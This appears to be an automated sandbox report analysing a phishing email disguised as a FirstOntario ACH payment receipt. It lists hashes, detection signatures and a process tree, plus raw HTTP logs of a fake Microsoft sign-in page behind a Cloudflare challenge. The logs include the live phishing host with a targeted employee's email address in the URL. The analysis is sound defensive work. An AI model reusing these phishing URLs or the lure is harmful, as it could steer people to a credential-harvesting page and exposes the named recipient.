Edit tour

Windows Analysis Report
702cb6e..eml

Overview

General Information

Sample name:702cb6e..eml
renamed because original name is a hash value
Original sample name:Approved ACH _ ePayments reciept for Firstontario epayment powered by Fastpay Ref_4104ee99b1c6f51c657203ba9a2ba2a3f702cb6e..eml
Analysis ID:1647413
MD5:aa0098ad9b78eecc3bafda7c9fab4f3c
SHA1:dac3eac0290307802aed3189f49f978bf910ab59
SHA256:b1ba0522ba590d4f8b8ec56f40d1a608f4f0b449fb1e8121052921d84542f7a3
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Phishing site or detected (based on various text indicators)
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6284 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\702cb6e..eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6868 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "95CF000C-774A-4100-AFA3-63A627741D63" "6C749FAE-6490-4EDE-8477-E3504078F85F" "6284" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 7112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\3Z35P0VG\Firstontario00990938376360__098.html MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 6248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12309989331383670353,2170291733396503276,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
    0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        0.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          0.9.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.9.pages.csv
            Source: Yara matchFile source: 0.6.pages.csv, type: HTML
            Source: Yara matchFile source: 0.7.pages.csv, type: HTML
            Source: Yara matchFile source: 0.8.pages.csv, type: HTML
            Source: Yara matchFile source: 0.9.pages.csv, type: HTML
            Source: EmailJoe Sandbox AI: Detected potential phishing email: Highly suspicious sender email address with random characters and multiple domains mixed together. Subject line contains misspelling ('reciept') and unusual formatting with reference numbers, typical of phishing. Mismatched sender name/email and suspicious domain 'vacationplanners.com' for a financial transaction
            Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Return-path contains suspicious long string of random characters and numbers, indicating potential obfuscation. Return-path domain (vacationplanners.com) doesn't match the apparent email service (pandadoc.net). Message originated from localhost (127.0.0.1) but was sent through a different IP (146.70.247.91), indicating potential spoofing. Unusual boundary string format with suspicious characters. Complex return-path structure suggests automated malicious email generation. No authentication results (SPF, DKIM, DMARC) present in headers. Message routing pattern suggests potential mail server abuse
            Source: Chrome DOM: 0.4OCR Text: Microsoft Secure browsing scan underway. Verifying... CLOUDFLARE Microsoft needs to confirm that your connection is secure before moving forward.
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Number of links: 0
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Base64 decoded: Kielbasa rump hamburger, nostrud fatback sausage beef ribs buffalo.
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Title: Sign in to your account does not match URL
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Invalid link: Privacy statement
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Invalid link: Privacy statement
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Invalid link: Privacy statement
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Invalid link: Privacy statement
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: Has password / email / username input fields
            Source: EmailClassification: Invoice Scam
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: <input type="password" .../> found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No favicon
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="author".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="author".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="author".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="author".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="copyright".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="copyright".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="copyright".. found
            Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmlHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.16:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 43.128.240.48:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.21:443 -> 192.168.2.16:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.28:443 -> 192.168.2.16:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.28:443 -> 192.168.2.16:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.151.109:443 -> 192.168.2.16:49772 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.35.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.35.163
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /RsNRx?e=alison.bagnulo@firstontario.com HTTP/1.1Host: newtargetonline.quokka.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /RsNRx/?e=alison.bagnulo@firstontario.com HTTP/1.1Host: newtargetonline.quokka.it.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92587e487fd0a0f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92587e487fd0a0f4/1742843686582/6a30bca1fa83cfbb7a517f97e2e014bf4040a5b9a58907bfe69be8647ccdf46a/Jwgj0Sg85DIMEmJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92587e487fd0a0f4/1742843686586/f64cEShR0G0gLXR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92587e487fd0a0f4/1742843686586/f64cEShR0G0gLXR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://newtargetonline.quokka.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
